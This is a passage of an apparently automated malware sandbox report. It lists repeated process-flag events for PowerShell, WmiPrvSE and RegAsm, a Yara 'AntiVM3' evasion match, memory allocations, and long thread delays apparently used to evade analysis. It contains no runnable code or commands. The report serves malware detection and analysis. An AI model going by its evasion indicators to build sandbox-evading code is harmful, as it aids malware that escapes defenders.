Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: C20000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2890000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4890000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1750000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3120000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 5120000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: FB0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2B00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2A10000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1565	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 947	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3349	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6434	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7154	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1798	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6961	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1598	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1296	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 401	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 3063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 3711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: foregroundWindowGot 1683
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 838
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 680

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484	Thread sleep count: 3349 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476	Thread sleep count: 6434 > 30	Jump to behavior
